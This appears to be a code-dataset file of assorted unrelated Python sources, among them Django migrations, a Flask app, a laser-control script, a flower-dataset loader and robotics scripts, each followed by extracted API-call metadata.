] | [((309, 671), 'django.db.migrations.RunSQL', 'migrations.RunSQL', (['"""\n UPDATE product_digitalcontenturl\n SET order_line_token = (\n SELECT token\n FROM order_orderline\n WHERE product_digitalcontenturl.line_id = order_orderline.id\n )\n WHERE line_id IS NOT NULL;\n """'], {'reverse_sql': 'migrations.RunSQL.noop'}), '(\n """\n UPDATE product_digitalcontenturl\n SET order_line_token = (\n SELECT token\n FROM order_orderline\n WHERE product_digitalcontenturl.line_id = order_orderline.id\n )\n WHERE line_id IS NOT NULL;\n """\n , reverse_sql=migrations.RunSQL.noop)\n', (326, 671), False, 'from django.db import migrations\n')] |
from argparse import ArgumentParser
from sys import stdin, stdout
from tempfile import NamedTemporaryFile
from time import sleep
from webbrowser import open as open_web
from naughtty import NaughTTY
from thtml import get_version
from thtml.cli import write_html
from thtml.options import Scope
def cli_entry() -> None:
parser = ArgumentParser(
add_help=False,
description="Converts text to HTML.",
epilog="Made with love by <NAME>: https://github.com/cariad/thtml",
)
parser.add_argument(
"-o",
"--open",
action="store_true",
help="opens the output in the default browser",
)
parser.add_argument(
"-s",
"--scope",
choices=[Scope.DOCUMENT.value, Scope.FRAGMENT.value],
default=Scope.DOCUMENT.value,
help="output an entire HTML document (default) or fragment",
)
parser.add_argument(
"-t",
"--theme",
help="name (default, google-fonts, plain) or path to custom theme YAML file",
)
parser.add_argument(
"--version",
action="store_true",
help="shows the version",
)
args, command = parser.parse_known_args()
if args.version:
print(get_version())
return
if command and command[0] == "--help":
parser.print_help()
exit(0)
if command:
ntty = NaughTTY(command)
ntty.execute()
body = ntty.output
else:
body = stdin.read()
if args.open:
with NamedTemporaryFile("a+", suffix=".html") as temp:
write_html(
text=body,
scope=Scope(args.scope),
writer=temp,
theme=args.theme,
)
open_web(f"file://{temp.name}")
# Give the browser a chance to open the file before we delete it:
sleep(1)
return
write_html(
text=body,
scope=Scope(args.scope),
writer=stdout,
theme=args.theme,
)
if __name__ == "__main__":
cli_entry()
| [
"thtml.options.Scope",
"argparse.ArgumentParser",
"webbrowser.open",
"time.sleep",
"naughtty.NaughTTY",
"thtml.get_version",
"tempfile.NamedTemporaryFile",
"sys.stdin.read"
] | [((336, 477), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'add_help': '(False)', 'description': '"""Converts text to HTML."""', 'epilog': '"""Made with love by <NAME>: https://github.com/cariad/thtml"""'}), "(add_help=False, description='Converts text to HTML.', epilog\n ='Made with love by <NAME>: https://github.com/cariad/thtml')\n", (350, 477), False, 'from argparse import ArgumentParser\n'), ((1387, 1404), 'naughtty.NaughTTY', 'NaughTTY', (['command'], {}), '(command)\n', (1395, 1404), False, 'from naughtty import NaughTTY\n'), ((1481, 1493), 'sys.stdin.read', 'stdin.read', ([], {}), '()\n', (1491, 1493), False, 'from sys import stdin, stdout\n'), ((1237, 1250), 'thtml.get_version', 'get_version', ([], {}), '()\n', (1248, 1250), False, 'from thtml import get_version\n'), ((1526, 1566), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', (['"""a+"""'], {'suffix': '""".html"""'}), "('a+', suffix='.html')\n", (1544, 1566), False, 'from tempfile import NamedTemporaryFile\n'), ((1757, 1788), 'webbrowser.open', 'open_web', (['f"""file://{temp.name}"""'], {}), "(f'file://{temp.name}')\n", (1765, 1788), True, 'from webbrowser import open as open_web\n'), ((1879, 1887), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (1884, 1887), False, 'from time import sleep\n'), ((1957, 1974), 'thtml.options.Scope', 'Scope', (['args.scope'], {}), '(args.scope)\n', (1962, 1974), False, 'from thtml.options import Scope\n'), ((1649, 1666), 'thtml.options.Scope', 'Scope', (['args.scope'], {}), '(args.scope)\n', (1654, 1666), False, 'from thtml.options import Scope\n')] |
from flask import Flask, render_template, url_for
import os
app = Flask(__name__)
# Homepage
@app.route('/')
def index():
return render_template('index.html')
# Domestic Dashboards
@app.route('/domestic/')
@app.route('/domestic/<model>')
def domestic(model=None):
return render_template('domestic.html', model=model)
# JSON API (allows users to "download" JSON files)
@app.route('/json/')
def json():
return str(os.listdir('static/json/'))
@app.route('/json/meta/')
@app.route('/json/meta/<file>')
def json_meta(file=None):
if file is not None:
with app.open_resource('static/json/meta/{}'.format(file)) as f:
return f.read()
else:
return str(os.listdir('static/json/meta/'))
@app.route('/json/models/')
@app.route('/json/models/<file>')
def json_models(file=None):
if file is not None:
with app.open_resource('static/json/models/{}'.format(file)) as f:
return f.read()
else:
return str(os.listdir('static/json/models/'))
# Trick (converting Python variable to Javascript variable)
# @app.route('/some/route/<url>')
# def convert_variable(url=None):
# x = some data pull (e.g. SQL query), dict or list
# if x is not None:
# return render_template('page.html', jsonify(x))
# return render_template('page.html', x) # then {{ x | tojson }} in page.html...
# else:
# return render_template('page.html')
| [
"flask.render_template",
"os.listdir",
"flask.Flask"
] | [((67, 82), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (72, 82), False, 'from flask import Flask, render_template, url_for\n'), ((136, 165), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (151, 165), False, 'from flask import Flask, render_template, url_for\n'), ((284, 329), 'flask.render_template', 'render_template', (['"""domestic.html"""'], {'model': 'model'}), "('domestic.html', model=model)\n", (299, 329), False, 'from flask import Flask, render_template, url_for\n'), ((431, 457), 'os.listdir', 'os.listdir', (['"""static/json/"""'], {}), "('static/json/')\n", (441, 457), False, 'import os\n'), ((699, 730), 'os.listdir', 'os.listdir', (['"""static/json/meta/"""'], {}), "('static/json/meta/')\n", (709, 730), False, 'import os\n'), ((980, 1013), 'os.listdir', 'os.listdir', (['"""static/json/models/"""'], {}), "('static/json/models/')\n", (990, 1013), False, 'import os\n')] |
import pyvisa
import time
import numpy as np
from struct import unpack
import matplotlib.pyplot as plt
rm = pyvisa.ResourceManager()
rm.list_resources()
GEM = rm.open_resource('ASRL3::INSTR')
def Turn_on():
GEM.write('ON')
GEM.write('POWER=001')
print('Laser has initialized!!!')
def SetPower(pw_mw):
GEM.write('POWER='+str(pw_mw))
print('Power has changed to '+str(pw_mw)+' mW!!!Please wait...')
time.sleep(10)
def Turn_off():
GEM.write('POWER=001')
print('Reset power!!!Please wait...')
time.sleep(10)
GEM.write('OFF')
print('Laser has been disabled!!!')
def PowerQ():
return GEM.query('POWER?').split()[0]
def tempQ():
temp_list = []
i = 0
while i < 5:
tt = GEM.query('LASTEMP?').split()
if tt != []:
tt = ''.join(list(tt[0])[:-1])
temp_list.append(float(tt))
i += 1
print(temp_list)
| [
"time.sleep",
"pyvisa.ResourceManager"
] | [((109, 133), 'pyvisa.ResourceManager', 'pyvisa.ResourceManager', ([], {}), '()\n', (131, 133), False, 'import pyvisa\n'), ((424, 438), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (434, 438), False, 'import time\n'), ((529, 543), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (539, 543), False, 'import time\n')] |
"""
Oxford Flowers dataset loader
1020 samples spanning 102 classes (avg 10 per class)
http://www.robots.ox.ac.uk/~vgg/data/flowers
"""
from __future__ import print_function
import numpy as np
from PIL import Image, ImageFile
from os.path import join
import os
import scipy.io
import tarfile
import shutil
from torch.utils.data.dataset import Dataset
from torchvision.datasets.utils import download_url
class OxfordFlowersDataset(Dataset):
# setup some class paths
sub_root_dir = 'OxfordFlowers'
download_url_prefix = 'http://www.robots.ox.ac.uk/~vgg/data/flowers/102'
images_dir = 'jpg'
def __init__(self,
root_dir,
split='train',
transform=None,
target_transform=None,
force_download=False,
categories_subset=None):
"""
:param root_dir: (string) the directory where the dataset will be stored
:param split: (string) 'train', 'trainval', 'val' or 'test'
:param transform: how to transform the input
:param target_transform: how to transform the target
:param force_download: (boolean) force a new download of the dataset
:param categories_subset: (iterable) specify a subset of categories to build this set from
"""
super(OxfordFlowersDataset, self).__init__()
# set instance variables
self.root_dir = join(os.path.expanduser(root_dir), self.sub_root_dir)
self.split = split
self.transform = transform
self.target_transform = target_transform
self.labels = []
# check if data exists, if not download
self.download(force=force_download)
# load the data samples for this split
self.data, self.labels, self.categories = self.load_data_split(categories_subset=categories_subset)
self.samples = list(zip(self.data, self.labels))
self.n_categories = len(np.unique(self.labels))
def __len__(self):
return len(self.samples)
def __getitem__(self, index):
# get the data sample
sample_data, sample_target = self.samples[index]
# load the image
x = self.load_img(join(join(self.root_dir, self.images_dir), "image_%05d.jpg" % (sample_data+1)))
y = sample_target
# perform the transforms
if self.transform:
x = self.transform(x)
if self.target_transform:
y = self.target_transform(y)
return x, y
def download(self, force=False):
# check for existence, if so return
if os.path.exists(join(self.root_dir, 'jpg')) and os.path.exists(join(self.root_dir, 'imagelabels.mat'))\
and os.path.exists(join(self.root_dir, 'setid.mat')):
if not force and len(os.listdir(join(self.root_dir, 'jpg'))) == 8189:
print('Files already downloaded and verified')
return
else:
shutil.rmtree(self.root_dir)
# make the dirs and start the downloads
os.makedirs(self.root_dir, exist_ok=True)
filename = '102flowers'
tar_filename = filename + '.tgz'
url = join(self.download_url_prefix, tar_filename)
download_url(url, self.root_dir, tar_filename, None)
with tarfile.open(join(self.root_dir, tar_filename), 'r') as tar_file:
tar_file.extractall(self.root_dir)
os.remove(join(self.root_dir, tar_filename))
filename = 'imagelabels.mat'
url = join(self.download_url_prefix, filename)
download_url(url, self.root_dir, filename, None)
filename = 'setid.mat'
url = join(self.download_url_prefix, filename)
download_url(url, self.root_dir, filename, None)
def load_data_split(self, categories_subset=None):
# assert we can do this split
assert self.split in ['train', 'val', 'test']
# load all the samples and their labels
all_samples = scipy.io.loadmat(join(self.root_dir, 'setid.mat'))
all_categories = scipy.io.loadmat(join(self.root_dir, 'imagelabels.mat'))['labels']
# keep only the split samples and categories
if self.split == 'train':
split_samples = all_samples['trnid']
elif self.split == 'val':
split_samples = all_samples['valid']
elif self.split == 'test':
split_samples = all_samples['tstid']
split_samples = list(split_samples[0]-1) # index at 0 not 1
split_categories = list(all_categories[0][split_samples])
# lets now add if they are in the category_subset iterable
data = []
categories = []
for index in range(len(split_samples)):
category = split_categories[index]
if categories_subset:
if category in categories_subset:
data.append(split_samples[index])
categories.append(split_categories[index])
else: # categories_subset is None so add all
data.append(split_samples[index])
categories.append(split_categories[index])
# Build categories to labels (cats can be names, labels are ints starting from 0)
self.categories_to_labels = {}
self.labels_to_categories = {}
for c in categories:
if c not in self.categories_to_labels:
self.categories_to_labels[c] = len(self.categories_to_labels)
self.labels_to_categories[self.categories_to_labels[c]] = c
# Build labels list corresponding to each sample
labels = []
for c in categories:
labels.append(self.categories_to_labels[c])
# set the data, categories and labels used in this dataset
# (initially ordered with self.samples and not unique, careful with access post shuffling)
self.categories = categories
self.labels = labels
self.data = data
return data, labels, categories
@staticmethod
def load_img(path):
# todo either turn image to tensor in transform or do here
# Load the image
ImageFile.LOAD_TRUNCATED_IMAGES = True
image = Image.open(path)#.convert('RGB')
return image
def stats(self):
# get the stats to print
counts = self.class_counts()
return "%d samples spanning %d classes (avg %d per class)" % \
(len(self.samples), len(counts), int(float(len(self.samples))/float(len(counts))))
def class_counts(self):
# calculate the number of samples per category
counts = {}
for index in range(len(self.samples)):
sample_data, sample_target = self.samples[index]
if sample_target not in counts:
counts[sample_target] = 1
else:
counts[sample_target] += 1
return counts
if __name__ == "__main__":
# use this for debugging and checks
from utils.debug import set_working_dir
from config.config import config
import matplotlib.pyplot as plt
# set the working directory as appropriate
set_working_dir()
# load the dataset
dataset = OxfordFlowersDataset(root_dir=config.dataset.root_dir)
# print the stats
print(dataset.stats())
# lets plot some samples
fig = plt.figure()
for i in range(len(dataset)):
sample = dataset[i]
ax = plt.subplot(1, 4, i + 1)
plt.tight_layout()
ax.set_title('Sample %d - Class %d' % (i, dataset.labels_to_categories[sample[1]])) # convert label to categ.
ax.axis('off')
plt.imshow(sample[0]) # todo when tensor will need to convert tensor to img
if i == 3:
plt.show()
break
| [
"matplotlib.pyplot.imshow",
"PIL.Image.open",
"numpy.unique",
"os.makedirs",
"os.path.join",
"torchvision.datasets.utils.download_url",
"utils.debug.set_working_dir",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.tight_layout",
"shutil.rmtree",
"matplotlib.pyplot.subplot",
"os.path.expanduser... | [((7147, 7164), 'utils.debug.set_working_dir', 'set_working_dir', ([], {}), '()\n', (7162, 7164), False, 'from utils.debug import set_working_dir\n'), ((7348, 7360), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (7358, 7360), True, 'import matplotlib.pyplot as plt\n'), ((3059, 3100), 'os.makedirs', 'os.makedirs', (['self.root_dir'], {'exist_ok': '(True)'}), '(self.root_dir, exist_ok=True)\n', (3070, 3100), False, 'import os\n'), ((3188, 3232), 'os.path.join', 'join', (['self.download_url_prefix', 'tar_filename'], {}), '(self.download_url_prefix, tar_filename)\n', (3192, 3232), False, 'from os.path import join\n'), ((3241, 3293), 'torchvision.datasets.utils.download_url', 'download_url', (['url', 'self.root_dir', 'tar_filename', 'None'], {}), '(url, self.root_dir, tar_filename, None)\n', (3253, 3293), False, 'from torchvision.datasets.utils import download_url\n'), ((3525, 3565), 'os.path.join', 'join', (['self.download_url_prefix', 'filename'], {}), '(self.download_url_prefix, filename)\n', (3529, 3565), False, 'from os.path import join\n'), ((3574, 3622), 'torchvision.datasets.utils.download_url', 'download_url', (['url', 'self.root_dir', 'filename', 'None'], {}), '(url, self.root_dir, filename, None)\n', (3586, 3622), False, 'from torchvision.datasets.utils import download_url\n'), ((3669, 3709), 'os.path.join', 'join', (['self.download_url_prefix', 'filename'], {}), '(self.download_url_prefix, filename)\n', (3673, 3709), False, 'from os.path import join\n'), ((3718, 3766), 'torchvision.datasets.utils.download_url', 'download_url', (['url', 'self.root_dir', 'filename', 'None'], {}), '(url, self.root_dir, filename, None)\n', (3730, 3766), False, 'from torchvision.datasets.utils import download_url\n'), ((6208, 6224), 'PIL.Image.open', 'Image.open', (['path'], {}), '(path)\n', (6218, 6224), False, 'from PIL import Image, ImageFile\n'), ((7438, 7462), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(4)', '(i + 1)'], {}), '(1, 4, i + 1)\n', (7449, 7462), True, 'import matplotlib.pyplot as plt\n'), ((7471, 7489), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (7487, 7489), True, 'import matplotlib.pyplot as plt\n'), ((7640, 7661), 'matplotlib.pyplot.imshow', 'plt.imshow', (['sample[0]'], {}), '(sample[0])\n', (7650, 7661), True, 'import matplotlib.pyplot as plt\n'), ((1428, 1456), 'os.path.expanduser', 'os.path.expanduser', (['root_dir'], {}), '(root_dir)\n', (1446, 1456), False, 'import os\n'), ((1952, 1974), 'numpy.unique', 'np.unique', (['self.labels'], {}), '(self.labels)\n', (1961, 1974), True, 'import numpy as np\n'), ((3438, 3471), 'os.path.join', 'join', (['self.root_dir', 'tar_filename'], {}), '(self.root_dir, tar_filename)\n', (3442, 3471), False, 'from os.path import join\n'), ((4005, 4037), 'os.path.join', 'join', (['self.root_dir', '"""setid.mat"""'], {}), "(self.root_dir, 'setid.mat')\n", (4009, 4037), False, 'from os.path import join\n'), ((7749, 7759), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7757, 7759), True, 'import matplotlib.pyplot as plt\n'), ((2212, 2248), 'os.path.join', 'join', (['self.root_dir', 'self.images_dir'], {}), '(self.root_dir, self.images_dir)\n', (2216, 2248), False, 'from os.path import join\n'), ((2613, 2639), 'os.path.join', 'join', (['self.root_dir', '"""jpg"""'], {}), "(self.root_dir, 'jpg')\n", (2617, 2639), False, 'from os.path import join\n'), ((2660, 2698), 'os.path.join', 'join', (['self.root_dir', '"""imagelabels.mat"""'], {}), "(self.root_dir, 'imagelabels.mat')\n", (2664, 2698), False, 'from os.path import join\n'), ((2736, 2768), 'os.path.join', 'join', (['self.root_dir', '"""setid.mat"""'], {}), "(self.root_dir, 'setid.mat')\n", (2740, 2768), False, 'from os.path import join\n'), ((2973, 3001), 'shutil.rmtree', 'shutil.rmtree', (['self.root_dir'], {}), '(self.root_dir)\n', (2986, 3001), False, 'import shutil\n'), ((3320, 3353), 'os.path.join', 'join', (['self.root_dir', 'tar_filename'], {}), '(self.root_dir, tar_filename)\n', (3324, 3353), False, 'from os.path import join\n'), ((4081, 4119), 'os.path.join', 'join', (['self.root_dir', '"""imagelabels.mat"""'], {}), "(self.root_dir, 'imagelabels.mat')\n", (4085, 4119), False, 'from os.path import join\n'), ((2815, 2841), 'os.path.join', 'join', (['self.root_dir', '"""jpg"""'], {}), "(self.root_dir, 'jpg')\n", (2819, 2841), False, 'from os.path import join\n')] |
#!/usr/bin/python3
import re
from custom_vims import VIMS
import json
"""
commands:
$ create_vims id port
$ create_vertiport ENAC
$ create_vertiport LFBO
$ get_vertiport vertiport_name
$ delete_vertiport vertiport_name
"""
def is_uuid(uuid):
"""
UUID encription.
"""
match = re.match('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}', uuid)
if match is None:
return False
else:
return True
def main():
"""
Main program.
"""
loop_vims_init = True
while loop_vims_init:
cmd_create_vims = input()
cmd_create_vims_args = re.split(r'\s', cmd_create_vims)
if cmd_create_vims_args[0] == "create_vims" \
and isinstance(cmd_create_vims_args[1], str) \
and int(cmd_create_vims_args[2]) < 9999 \
and int(cmd_create_vims_args[2]) >= 1000:
vims = VIMS(cmd_create_vims_args[1], cmd_create_vims_args[2])
loop_vims_init = False
else:
print('bad cmd, use $ create_vims id port')
while True:
try:
cmd = input('\n')
cmd_args = re.split(r'\s', cmd)
if cmd_args[0] == "get_vertiport":
vims.get_vertiport(cmd_args[1])
elif cmd_args[0] == "create_vertiport":
vims.create_vertiport_test("ENAC_Vertiport.json")
vims.create_vertiport_test("LFBO_Vertiport.json")
elif cmd_args[0] == "delete_vertiport":
vims.delete_vertiport()
except KeyboardInterrupt:
# delete all ISAs created
print("Deleting Vertiports before killing VIMS")
for vertiport in vims.vertiports:
vims.delete_vertiport(_vertiport_name=vertiport.name)
print("Done")
return
if __name__ == "__main__":
main() | [
"re.split",
"custom_vims.VIMS",
"re.match"
] | [((283, 386), 're.match', 're.match', (['"""[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}"""', 'uuid'], {}), "(\n '[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}'\n , uuid)\n", (291, 386), False, 'import re\n'), ((571, 603), 're.split', 're.split', (['"""\\\\s"""', 'cmd_create_vims'], {}), "('\\\\s', cmd_create_vims)\n", (579, 603), False, 'import re\n'), ((799, 853), 'custom_vims.VIMS', 'VIMS', (['cmd_create_vims_args[1]', 'cmd_create_vims_args[2]'], {}), '(cmd_create_vims_args[1], cmd_create_vims_args[2])\n', (803, 853), False, 'from custom_vims import VIMS\n'), ((991, 1011), 're.split', 're.split', (['"""\\\\s"""', 'cmd'], {}), "('\\\\s', cmd)\n", (999, 1011), False, 'import re\n')] |
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from django.urls import re_path
from chat.consumers import ChatConsumer
from teams.consumers import InvitationConsumer
application = ProtocolTypeRouter({
'websocket': AuthMiddlewareStack(
URLRouter([
re_path(r'^ws/chat/(?P<room_name>[^/]+)/$', ChatConsumer),
re_path(r'^ws/invitation/(?P<id>[^/]+)/$', InvitationConsumer)
])
),
}) | [
"django.urls.re_path"
] | [((332, 388), 'django.urls.re_path', 're_path', (['"""^ws/chat/(?P<room_name>[^/]+)/$"""', 'ChatConsumer'], {}), "('^ws/chat/(?P<room_name>[^/]+)/$', ChatConsumer)\n", (339, 388), False, 'from django.urls import re_path\n'), ((403, 464), 'django.urls.re_path', 're_path', (['"""^ws/invitation/(?P<id>[^/]+)/$"""', 'InvitationConsumer'], {}), "('^ws/invitation/(?P<id>[^/]+)/$', InvitationConsumer)\n", (410, 464), False, 'from django.urls import re_path\n')] |
import json
from spaceone.inventory.libs.manager import AWSManager
from spaceone.inventory.connector.pricing import PricingConnector
from spaceone.inventory.model.pricing.cloud_service_type import CLOUD_SERVICE_TYPES
class PricingManager(AWSManager):
conn = None
def __init__(self, transaction=None, **kwargs):
super().__init__(transaction=transaction)
self.conn: PricingConnector = self.locator.get_connector('PricingConnector', **kwargs)
self.conn.set_client()
def list_service_codes(self):
services = self.conn.describe_services()
return [service.get('ServiceCode') for service in services if service.get('ServiceCode')]
def list_products(self, service_code):
for product in self.conn.get_products(service_code):
yield json.loads(product)
@staticmethod
def collect_cloud_service_types():
for cloud_service_type in CLOUD_SERVICE_TYPES:
yield cloud_service_type
| [
"json.loads"
] | [((803, 822), 'json.loads', 'json.loads', (['product'], {}), '(product)\n', (813, 822), False, 'import json\n')] |
# Generated by Django 2.1.3 on 2019-02-13 13:00
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('django_drf_filepond', '0002_add_upload_dir'),
]
operations = [
migrations.CreateModel(
name='StoredUpload',
fields=[
('upload_id',
models.CharField(
max_length=22, primary_key=True, serialize=False,
validators=[
django.core.validators.MinLengthValidator(22)])),
('file_path', models.CharField(max_length=2048)),
('uploaded', models.DateTimeField()),
('stored', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((625, 658), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2048)'}), '(max_length=2048)\n', (641, 658), False, 'from django.db import migrations, models\n'), ((690, 712), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (710, 712), False, 'from django.db import migrations, models\n'), ((742, 781), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (762, 781), False, 'from django.db import migrations, models\n')] |
from java.lang import String
from org.myrobotlab.service import Speech
from org.myrobotlab.service import Sphinx
from org.myrobotlab.service import Runtime
# create mouth arduino and servo
ear = Runtime.createAndStart("ear","Sphinx")
arduino = Runtime.createAndStart("arduino","Arduino")
arduino.connect("COM4")
servo = Runtime.createAndStart("servo","Servo")
servo.attach(arduino, 10)
# start listening for the words we are interested in
ear.startListening("go forward|go backwards|stop")
# set up a message route from the ear --to--> python method "heard"
ear.addListener("recognized", python.name, "heard", String().getClass());
# this method is invoked when something is
# recognized by the ear - in this case we
# have the mouth "talk back" the word it recognized
def heard(phrase):
print("I heard ", phrase)
if phrase == "go forward":
servo.moveTo(170)
elif phrase == "go backwards":
servo.moveTo(10)
elif phrase == "stop":
servo.moveTo(90)
| [
"java.lang.String",
"org.myrobotlab.service.Runtime.createAndStart"
] | [((198, 237), 'org.myrobotlab.service.Runtime.createAndStart', 'Runtime.createAndStart', (['"""ear"""', '"""Sphinx"""'], {}), "('ear', 'Sphinx')\n", (220, 237), False, 'from org.myrobotlab.service import Runtime\n'), ((247, 291), 'org.myrobotlab.service.Runtime.createAndStart', 'Runtime.createAndStart', (['"""arduino"""', '"""Arduino"""'], {}), "('arduino', 'Arduino')\n", (269, 291), False, 'from org.myrobotlab.service import Runtime\n'), ((323, 363), 'org.myrobotlab.service.Runtime.createAndStart', 'Runtime.createAndStart', (['"""servo"""', '"""Servo"""'], {}), "('servo', 'Servo')\n", (345, 363), False, 'from org.myrobotlab.service import Runtime\n'), ((619, 627), 'java.lang.String', 'String', ([], {}), '()\n', (625, 627), False, 'from java.lang import String\n')] |
import numpy as np
import dace as dc
M, N = (dc.symbol(s, dtype=dc.int64) for s in ('M', 'N'))
@dc.program
def flip(A: dc.float64[M]):
B = np.ndarray((M, ), dtype=np.float64)
for i in dc.map[0:M]:
B[i] = A[M - 1 - i]
return B
@dc.program
def kernel(r: dc.float64[N]):
y = np.empty_like(r)
alpha = -r[0]
beta = 1.0
y[0] = -r[0]
for k in range(1, N):
beta *= 1.0 - alpha * alpha
alpha = -(r[k] + np.dot(flip(r[:k]), y[:k])) / beta
y[:k] += alpha * flip(y[:k])
y[k] = alpha
return y
| [
"numpy.empty_like",
"numpy.ndarray",
"dace.symbol"
] | [((46, 74), 'dace.symbol', 'dc.symbol', (['s'], {'dtype': 'dc.int64'}), '(s, dtype=dc.int64)\n', (55, 74), True, 'import dace as dc\n'), ((146, 180), 'numpy.ndarray', 'np.ndarray', (['(M,)'], {'dtype': 'np.float64'}), '((M,), dtype=np.float64)\n', (156, 180), True, 'import numpy as np\n'), ((302, 318), 'numpy.empty_like', 'np.empty_like', (['r'], {}), '(r)\n', (315, 318), True, 'import numpy as np\n')] |
import starry
import numpy as np
import matplotlib.pyplot as plt
import pytest
@pytest.mark.parametrize("ydeg,nw", [[0, None], [0, 10], [1, None], [1, 10]])
def test_system(ydeg, nw):
# Oblate map
map = starry.Map(udeg=2, ydeg=ydeg, oblate=True, nw=nw)
map[1] = 0.5
map[2] = 0.25
map.omega = 0.5
map.beta = 1.23
map.tpole = 8000
map.f = 1 - 2 / (map.omega ** 2 + 2)
map.obl = 30
# Compute system flux
star = starry.Primary(map, r=1.5)
planet = starry.Secondary(starry.Map(amp=0, nw=nw), porb=1.0, r=0.1, m=0)
sys = starry.System(star, planet)
t = np.linspace(-0.1, 0.1, 1000)
flux_sys = sys.flux(t, integrated=True)
# Compute map flux manually
x, y, z = sys.position(t)
xo = x[1] / star._r
yo = y[1] / star._r
flux_map = map.flux(xo=xo, yo=yo, ro=planet._r / star._r, integrated=True)
# Check that they agree
assert np.allclose(flux_map, flux_sys)
| [
"numpy.allclose",
"starry.Primary",
"starry.Map",
"starry.System",
"pytest.mark.parametrize",
"numpy.linspace"
] | [((82, 158), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""ydeg,nw"""', '[[0, None], [0, 10], [1, None], [1, 10]]'], {}), "('ydeg,nw', [[0, None], [0, 10], [1, None], [1, 10]])\n", (105, 158), False, 'import pytest\n'), ((214, 263), 'starry.Map', 'starry.Map', ([], {'udeg': '(2)', 'ydeg': 'ydeg', 'oblate': '(True)', 'nw': 'nw'}), '(udeg=2, ydeg=ydeg, oblate=True, nw=nw)\n', (224, 263), False, 'import starry\n'), ((456, 482), 'starry.Primary', 'starry.Primary', (['map'], {'r': '(1.5)'}), '(map, r=1.5)\n', (470, 482), False, 'import starry\n'), ((571, 598), 'starry.System', 'starry.System', (['star', 'planet'], {}), '(star, planet)\n', (584, 598), False, 'import starry\n'), ((607, 635), 'numpy.linspace', 'np.linspace', (['(-0.1)', '(0.1)', '(1000)'], {}), '(-0.1, 0.1, 1000)\n', (618, 635), True, 'import numpy as np\n'), ((910, 941), 'numpy.allclose', 'np.allclose', (['flux_map', 'flux_sys'], {}), '(flux_map, flux_sys)\n', (921, 941), True, 'import numpy as np\n'), ((513, 537), 'starry.Map', 'starry.Map', ([], {'amp': '(0)', 'nw': 'nw'}), '(amp=0, nw=nw)\n', (523, 537), False, 'import starry\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 15 19:41:48 2021
@author: Traftmine
"""
import time
import pyautogui
START = time.time()
time.sleep(5)
SCRIPT = open("beescript.txt", 'r')
for word in SCRIPT:
pyautogui.typewrite(word)
pyautogui.press("enter")
SCRIPT.close()
END = time.time()
print("The spam last for", round(END-START, 2), "secondes")
| [
"pyautogui.press",
"time.time",
"time.sleep",
"pyautogui.typewrite"
] | [((135, 146), 'time.time', 'time.time', ([], {}), '()\n', (144, 146), False, 'import time\n'), ((148, 161), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (158, 161), False, 'import time\n'), ((304, 315), 'time.time', 'time.time', ([], {}), '()\n', (313, 315), False, 'import time\n'), ((225, 250), 'pyautogui.typewrite', 'pyautogui.typewrite', (['word'], {}), '(word)\n', (244, 250), False, 'import pyautogui\n'), ((256, 280), 'pyautogui.press', 'pyautogui.press', (['"""enter"""'], {}), "('enter')\n", (271, 280), False, 'import pyautogui\n')] |
# Generated by Django 2.2.26 on 2022-02-25 16:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("home", "0002_listecategorie_utilisateurs"),
]
operations = [
migrations.CreateModel(
name="Listerole",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("nom", models.CharField(max_length=16)),
],
),
migrations.AddField(
model_name="utilisateurs",
name="photo",
field=models.URLField(blank=True, null=True),
),
]
| [
"django.db.models.URLField",
"django.db.models.AutoField",
"django.db.models.CharField"
] | [((806, 844), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (821, 844), False, 'from django.db import migrations, models\n'), ((381, 474), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (397, 474), False, 'from django.db import migrations, models\n'), ((634, 665), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(16)'}), '(max_length=16)\n', (650, 665), False, 'from django.db import migrations, models\n')] |
from django.contrib import admin
# Register your models here.
from .models import Organizer
admin.site.register(Organizer) | [
"django.contrib.admin.site.register"
] | [((93, 123), 'django.contrib.admin.site.register', 'admin.site.register', (['Organizer'], {}), '(Organizer)\n', (112, 123), False, 'from django.contrib import admin\n')] |
"""Utility class for multivariate time series transformation."""
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import numpy as np
from scipy.sparse import csr_matrix, hstack
from sklearn.base import BaseEstimator, TransformerMixin, clone
from sklearn.utils.validation import check_is_fitted
from ..utils import check_3d_array
